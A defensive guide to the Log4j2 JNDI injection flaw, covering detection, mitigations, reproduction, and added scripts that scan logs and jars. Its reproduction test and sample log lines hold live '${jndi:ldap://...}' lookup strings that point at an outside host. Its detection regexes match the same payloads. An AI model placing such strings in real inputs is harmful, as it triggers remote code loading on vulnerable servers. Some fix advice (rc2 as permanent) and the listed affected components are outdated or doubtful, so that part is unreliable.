Log4j JNDI injection vulnerability: verification and fix

I. Vulnerability description

Official description of the flaw: Apache Log4j2 contains a JNDI injection vulnerability. It is triggered when the application writes user-supplied data to its logs, and successful exploitation allows arbitrary code execution on the target server.

Put simply: when a log message contains the keyword ${, the content it encloses is treated as a variable to be resolved, so an attacker can have it replaced with an arbitrary command, which is then executed.

II. Detection approach

1. Use traffic-monitoring devices to watch for requests to the relevant DNSLog domains.
2. Search the relevant logs for strings such as "jndi:ldap://" and "jndi:rmi" to identify possible attack attempts.
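
The log search in item 2, as an added example that is not part of the original post. It goes slightly beyond the two literal strings above: matching is case-insensitive, covers the other JNDI URL schemes, and collapses ${lower:..}/${upper:..} wrappers, which a plain substring search would miss. The log lines, the 10.0.0.x source addresses and the 203.0.113.x callback hosts (a documentation-only address range) are constructed for the example; the extracted callback host is the value to correlate with the DNS/egress monitoring of item 1.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines (not from the original post): an access log that records
# the User-Agent header, a field applications commonly log verbatim.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 200 "${JNDI:RMI://203.0.113.10:1099/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /api HTTP/1.1" 200 "${${lower:j}ndi:ldap://203.0.113.10:1389/c}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /price?id=${} HTTP/1.1" 200 "curl/7.79"',
]

# ${lower:x} / ${upper:x} wrappers are unwrapped so a split-up "jndi" reassembles.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
# After normalisation: ${ ... jndi:<scheme>://<host[:port]> ...
_JNDI_LOOKUP = re.compile(
    r"\$\{[^}]*?jndi:(?P<scheme>ldaps?|rmi|dns|iiop)://(?P<host>[^/}\s]+)",
    re.IGNORECASE,
)
_SOURCE_IP = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s")


@dataclass
class Alert:
    line_no: int
    source_ip: Optional[str]
    scheme: str
    callback_host: str  # host[:port] the JVM would contact; cross-check with DNS/egress logs
    raw: str


def normalize(text: str, max_rounds: int = 5) -> str:
    """Unwrap nested ${lower:..}/${upper:..} a bounded number of times."""
    for _ in range(max_rounds):
        unwrapped = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        if unwrapped == text:
            break
        text = unwrapped
    return text


def scan_line(line_no: int, line: str) -> Optional[Alert]:
    """Return an Alert when the line carries a JNDI lookup string, else None."""
    match = _JNDI_LOOKUP.search(normalize(line))
    if not match:
        return None
    ip = _SOURCE_IP.match(line)
    return Alert(line_no, ip.group(1) if ip else None,
                 match.group("scheme").lower(), match.group("host"), line)


def scan_lines(lines: List[str]) -> List[Alert]:
    return [a for a in (scan_line(i, l) for i, l in enumerate(lines, 1)) if a]


def callback_hosts(alerts: List[Alert]) -> List[str]:
    """Distinct host[:port] values: the egress indicators to block and hunt for."""
    return sorted({a.callback_host for a in alerts})


if __name__ == "__main__":
    found = scan_lines(SAMPLE_LOG_LINES)
    for a in found:
        print(f"line {a.line_no}: src={a.source_ip} jndi:{a.scheme}://{a.callback_host}")
    print("callback hosts:", callback_hosts(found))
```

Feed it the application log rather than only the web server access log: the vulnerable call is wherever the attacker-controlled string reaches a Log4j logger, which is often a header, form field or username that the web tier never records.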

III. Affected versions

Apache log4j2 >= 2.0, <= 2.14.1

IV. Affected components

Apache Struts2
Apache Solr
Apache Druid
Apache Flink
Apache Flume
Apache Dubbo
Apache Kafka
spring-boot-starter-log4j2
ElasticSearch
Redis
Logstash

V. Permanent fix (with upgrade package download)

The rc1 release has already been bypassed, so apply the official temporary patch below and upgrade to log4j-2.15.0-rc2.

Upgrade package download: log4j-2.15.0-rc2.zip

VI. Temporary mitigations

1. Block outbound internet access for services that do not need it.
2. Set the JVM parameter

-Dlog4j2.formatMsgNoLookups=true

3. Set the property

log4j2.formatMsgNoLookups=True

4. Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to "true"
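
A check for items 2 to 4, added here as an example rather than taken from the post. It reports which of the three settings disables message lookups and adds the caveat a practitioner needs: formatMsgNoLookups only exists from Log4j 2.10.0, so on older affected releases the flag is silently ignored and the jar must be upgraded instead. It assumes the property from item 3 lives in log4j2.component.properties on the classpath (Log4j's documented location) and that values are compared case-insensitively, matching how Log4j parses booleans; the version strings and settings passed to assess() are constructed inputs.

```python
import re
from typing import Dict, Iterable, Optional, Tuple

FLAG = "log4j2.formatMsgNoLookups"
ENV_VAR = "FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS"
FLAG_SUPPORTED_FROM = (2, 10, 0)      # the flag exists only from 2.10.0; older releases ignore it
AFFECTED = ((2, 0, 0), (2, 14, 1))    # range stated in the post


def parse_version(text: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); '2.15.0-rc2' -> (2, 15, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    return int(m[1]), int(m[2]), int(m[3] or 0)


def _is_true(value: Optional[str]) -> bool:
    # Log4j reads these with Boolean.parseBoolean, so "True" and "true" both count.
    return value is not None and value.strip().lower() == "true"


def lookups_disabled(jvm_args: Iterable[str], properties: str, env: Dict[str, str]) -> Optional[str]:
    """Return which setting disables lookups, or None if none of the three does."""
    for arg in jvm_args:                                  # item 2: -Dlog4j2.formatMsgNoLookups=true
        if arg.startswith(f"-D{FLAG}=") and _is_true(arg.split("=", 1)[1]):
            return "JVM argument"
    for line in properties.splitlines():                  # item 3: log4j2.component.properties
        key, sep, val = line.partition("=")
        if sep and key.strip() == FLAG and _is_true(val):
            return "log4j2.component.properties"
    if _is_true(env.get(ENV_VAR)):                        # item 4: environment variable
        return "environment variable"
    return None


def assess(version: str, jvm_args: Iterable[str], properties: str, env: Dict[str, str]) -> str:
    """One-line verdict for a deployment running the given log4j-core version."""
    v = parse_version(version)
    if not (AFFECTED[0] <= v <= AFFECTED[1]):
        return f"{version}: outside the affected range listed in the post"
    source = lookups_disabled(jvm_args, properties, env)
    if source is None:
        return f"{version}: affected, no lookup mitigation found"
    if v < FLAG_SUPPORTED_FROM:
        return f"{version}: affected, {source} sets {FLAG} but releases before 2.10.0 ignore it"
    return f"{version}: affected, message lookups disabled via {source}"


if __name__ == "__main__":
    # Constructed inputs for the demonstration
    print(assess("2.14.1", ["-Xmx1g", "-Dlog4j2.formatMsgNoLookups=true"], "", {}))
    print(assess("2.9.1", [], "log4j2.formatMsgNoLookups=True", {}))
    print(assess("2.14.1", [], "", {}))
```

The version gate matters in practice: a fleet-wide rollout of the JVM flag looks complete in a config audit yet leaves every 2.0 to 2.9.x instance exposed, so the check should always be paired with an inventory of the actual log4j-core version in each deployment.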

VII. Reproducing the vulnerability

1. Create a new Maven project
2. Use the following pom file

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>org.example</groupId>
    <artifactId>log4j-test</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>1.8</maven.compiler.source>
        <maven.compiler.target>1.8</maven.compiler.target>
        <log4j.version>2.14.1</log4j.version>
    </properties>

    <dependencies>

        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>${log4j.version}</version>
            <scope>compile</scope>
        </dependency>

        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>${log4j.version}</version>
            <scope>compile</scope>
            <exclusions>
                <exclusion>
                    <groupId>org.apache.logging.log4j</groupId>
                    <artifactId>log4j-api</artifactId>
                </exclusion>
            </exclusions>
        </dependency>


        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>RELEASE</version>
            <scope>test</scope>
        </dependency>
    </dependencies>

</project>

3. Create a test class

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.junit.Test;

import java.io.IOException;

public class Log4jTest {

    private static final Logger log = LogManager.getLogger();

    @Test
    public void test() throws IOException {
        // Lookup string placed directly in the log message
        log.error("${jndi:ldap://172.18.1.1:1389/#Exploit}");
        // Same string passed as a log parameter instead of in the message
        log.error("${}", "jndi:ldap://172.18.1.1:1389/#Exploit");
    }
}

4. Start Wireshark (download: https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.6.0.exe)
If the vulnerability is present, the following traffic is captured; if it is not, nothing is captured.
[Screenshot: captured traffic]

VIII. Building log4j-2.15.0-rc locally

1. Download the source

https://github.com/apache/logging-log4j2/archive/refs/tags/log4j-2.15.0-rc2.zip

2. Install JDK 8, 9 and 11.

Note: all three must be installed, and the JDK currently in use must be set to Java 8; verify with java -version and javac -version.

At first I installed only 8 and it failed, saying 9 was required; then I installed 9 and it still failed, saying 11 was also required; only after installing 11 as well did it get past the JDK environment

3. Open the source in IDEA

4. Edit the JDK install paths in toolchains-sample-win.xml

<?xml version="1.0" encoding="UTF8"?>
<!--
  ~ Licensed to the Apache Software Foundation (ASF) under one or more
  ~ contributor license agreements. See the NOTICE file distributed with
  ~ this work for additional information regarding copyright ownership.
  ~ The ASF licenses this file to You under the Apache license, Version 2.0
  ~ (the "License"); you may not use this file except in compliance with
  ~ the License. You may obtain a copy of the License at
  ~
  ~      http://www.apache.org/licenses/LICENSE-2.0
  ~
  ~ Unless required by applicable law or agreed to in writing, software
  ~ distributed under the License is distributed on an "AS IS" BASIS,
  ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  ~ See the license for the specific language governing permissions and
  ~ limitations under the license.
  -->
<toolchains>
  <!-- JDK toolchains -->
  <!--<toolchain>
    <type>jdk</type>
    <provides>
      <version>1.7</version>
      <vendor>sun</vendor>
    </provides>
    <configuration>
      <jdkHome>C:\Program Files\Java\jdk1.7.0_80</jdkHome>
    </configuration>
  </toolchain>-->
  <toolchain>
    <type>jdk</type>
    <provides>
      <version>1.8</version>
      <vendor>sun</vendor>
    </provides>
    <configuration>
      <jdkHome>D:\Program Files\Java\jdk1.8.0_301</jdkHome>
    </configuration>
  </toolchain>
  <toolchain>
    <type>jdk</type>
    <provides>
      <version>9</version>
      <vendor>sun</vendor>
    </provides>
    <configuration>
      <jdkHome>D:\Program Files\Java\jdk-9.0.4</jdkHome>
    </configuration>
  </toolchain>
  <toolchain>
    <type>jdk</type>
    <provides>
      <version>11</version>
      <vendor>oracle</vendor>
    </provides>
    <configuration>
      <jdkHome>D:\Program Files\Java\jdk-11.0.13</jdkHome>
    </configuration>
  </toolchain>

  <!-- other toolchains -->
</toolchains>

5. Edit toolchains.xml in Maven's conf directory and set the Java 11 install path

<?xml version="1.0" encoding="UTF-8"?>

<!--
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements.  See the NOTICE file
distributed with this work for additional information
regarding copyright ownership.  The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License.  You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied.  See the License for the
specific language governing permissions and limitations
under the License.
-->

<!--
 | This is the toolchains file for Maven. It can be specified at two levels:
 |
 |  1. User Level. This toolchains.xml file provides configuration for a single user,
 |                 and is normally provided in ${user.home}/.m2/toolchains.xml.
 |
 |                 NOTE: This location can be overridden with the CLI option:
 |
 |                 -t /path/to/user/toolchains.xml
 |
 |  2. Global Level. This toolchains.xml file provides configuration for all Maven
 |                 users on a machine (assuming they're all using the same Maven
 |                 installation). It's normally provided in
 |                 ${maven.conf}/toolchains.xml.
 |
 |                 NOTE: This location can be overridden with the CLI option:
 |
 |                 -gt /path/to/global/toolchains.xml
 |
 | The sections in this sample file are intended to give you a running start at
 | getting the most out of your Maven installation.
 |-->
<toolchains xmlns="http://maven.apache.org/TOOLCHAINS/1.1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/TOOLCHAINS/1.1.0 http://maven.apache.org/xsd/toolchains-1.1.0.xsd">

  <!-- 
   | With toolchains you can refer to installations on your system. This 
   | way you don't have to hardcode paths in your pom.xml. 
   | 
   | Every toolchain consist of 3 elements: 
   | * type: the type of tool. An often used value is 'jdk'. Toolchains-aware 
   |   plugins should document which type you must use. 
   | 
   | * provides: A list of key/value-pairs. 
   |   Based on the toolchain-configuration in the pom.xml Maven will search for 
   |   matching <provides/> configuration. You can decide for yourself which key-value 
   |   pairs to use. Often used keys are 'version', 'vendor' and 'arch'. By default 
   |   the version has a special meaning. If you configured in the pom.xml '1.5' 
   |   Maven will search for 1.5 and above.
   |   
   | * configuration: Additional configuration for this tool.
   |   Look for documentation of the toolchains-aware plugin which configuration elements
   |   can be used.   
   |
   | See also https://maven.apache.org/guides/mini/guide-using-toolchains.html
   |
   | General example

  <toolchain>
    <type/>
    <provides> 
      <version>1.0</version> 
    </provides> 
    <configuration/>
  </toolchain>
   
   | JDK examples

  <toolchain>
    <type>jdk</type>
    <provides>
      <version>1.5</version>
      <vendor>sun</vendor>
    </provides>
    <configuration>
      <jdkHome>/path/to/jdk/1.5</jdkHome>
    </configuration>
  </toolchain>
  <toolchain>
    <type>jdk</type>
    <provides>
      <version>1.6</version>
      <vendor>sun</vendor>
    </provides>
    <configuration>
      <jdkHome>/path/to/jdk/1.6</jdkHome>
    </configuration>
  </toolchain>
   
  -->
  <toolchain>
    <type>jdk</type>
    <provides>
      <version>11</version>
      <vendor>oracle</vendor>
    </provides>
    <configuration>
      <jdkHome>D:\Program Files\Java\jdk-11.0.13</jdkHome>
    </configuration>
  </toolchain>
</toolchains>

6. Build and install into the local repository

Run mvn clean install -t ./toolchains-sample-win.xml -Dmaven.test.skip=true -f pom.xml to build and install into the local repository.

According to references [1] and [2], the recommended way to fix the Log4j vulnerability is to remove the vulnerable class. Specifically, delete the vulnerable class from the log4j-core jar with the following command: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. This fix is fairly stable and is the officially recommended approach. Also, according to reference [2], check whether the Java application includes the two jars log4j-api and log4j-core; if an application uses both, it is very likely affected. In addition, according to reference [3], the vulnerability is CVE-2021-44228, caused by a JNDI injection flaw in the log4j-core code. It can lead directly to server compromise, and because of how logging works, attack data can propagate through several layers and even threaten servers on a purely internal network. Given that log4j is a basic, widely used logging library in Java development, the impact may be very far-reaching, similar to the earlier commons-collections deserialization vulnerability. Therefore, to fix the Log4j vulnerability, the recommended approach is to remove the vulnerable class, and to promptly detect and update the log4j-api and log4j-core jars used by Java applications.

References
[1], [3] Latest fix options for the critical Log4j vulnerability: https://blog.csdn.net/Javaesandyou/article/details/122071474
[2] Fixing the Log4j2 vulnerability: https://blog.csdn.net/derstsea/article/details/121918902
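
A scanner that combines the affected range from section III with the class-removal fix above, added here as an example and not taken from the post or the referenced articles. For every jar under a directory it reads the log4j-core version from META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties, checks whether org/apache/logging/log4j/core/lookup/JndiLookup.class is still present (the entry the zip -d command deletes), and gives a verdict. The jars it scans in the demo are constructed stand-ins containing only those two entries. The range constants are the ones the post states; later Apache advisories widened the affected range, so update AFFECTED_MAX from the current advisory before relying on the "outside affected range" verdict.

```python
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
AFFECTED_MIN, AFFECTED_MAX = (2, 0, 0), (2, 14, 1)   # range stated in the post


@dataclass
class Finding:
    path: str
    version: Optional[str]
    in_affected_range: bool
    has_jndi_lookup: bool

    @property
    def verdict(self) -> str:
        if self.version is None:
            return "version unknown, inspect manually"
        if not self.in_affected_range:
            return "outside affected range"
        return "vulnerable" if self.has_jndi_lookup else "mitigated (JndiLookup.class removed)"


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """'2.14.1' -> (2, 14, 1); '2.15.0-rc2' -> (2, 15, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return (int(m[1]), int(m[2]), int(m[3] or 0)) if m else None


def inspect_jar(path: str) -> Optional[Finding]:
    """Return a Finding for a log4j-core jar, None for any other jar."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        if POM_PROPS not in names:
            return None
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.MULTILINE)
        version = m.group(1).strip() if m else None
    v = parse_version(version) if version else None
    affected = v is not None and AFFECTED_MIN <= v <= AFFECTED_MAX
    return Finding(path, version, affected, JNDI_LOOKUP_CLASS in names)


def scan_tree(root: str) -> List[Finding]:
    """Walk a directory tree and inspect every *.jar in it."""
    out = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".jar"):
                finding = inspect_jar(os.path.join(dirpath, name))
                if finding:
                    out.append(finding)
    return sorted(out, key=lambda f: f.path)


def make_fake_log4j_core(path: str, version: str, with_jndi_lookup: bool) -> str:
    """Constructed stand-in for a log4j-core jar holding only the two entries the scanner reads."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only, not real bytecode
    return path


def demo() -> List[str]:
    """Scan three constructed jars: unpatched, class removed, and a newer release."""
    with tempfile.TemporaryDirectory() as tmp:
        make_fake_log4j_core(os.path.join(tmp, "a-log4j-core-2.14.1.jar"), "2.14.1", True)
        make_fake_log4j_core(os.path.join(tmp, "b-log4j-core-2.14.1.jar"), "2.14.1", False)
        make_fake_log4j_core(os.path.join(tmp, "c-log4j-core-2.15.0.jar"), "2.15.0-rc2", True)
        return [f"{os.path.basename(f.path)}: version={f.version} -> {f.verdict}" for f in scan_tree(tmp)]


if __name__ == "__main__":
    print("\n".join(demo()))
```

Pointing scan_tree() at an application's lib directory (or at an unpacked war/ear) gives an inventory of which log4j-core copies are present, which is the detection step reference [2] calls for before any upgrade or class removal. Fat jars that bundle log4j-core under a different layout, or shaded copies with relocated package names, are not recognised by this check and need a content search for the class name instead.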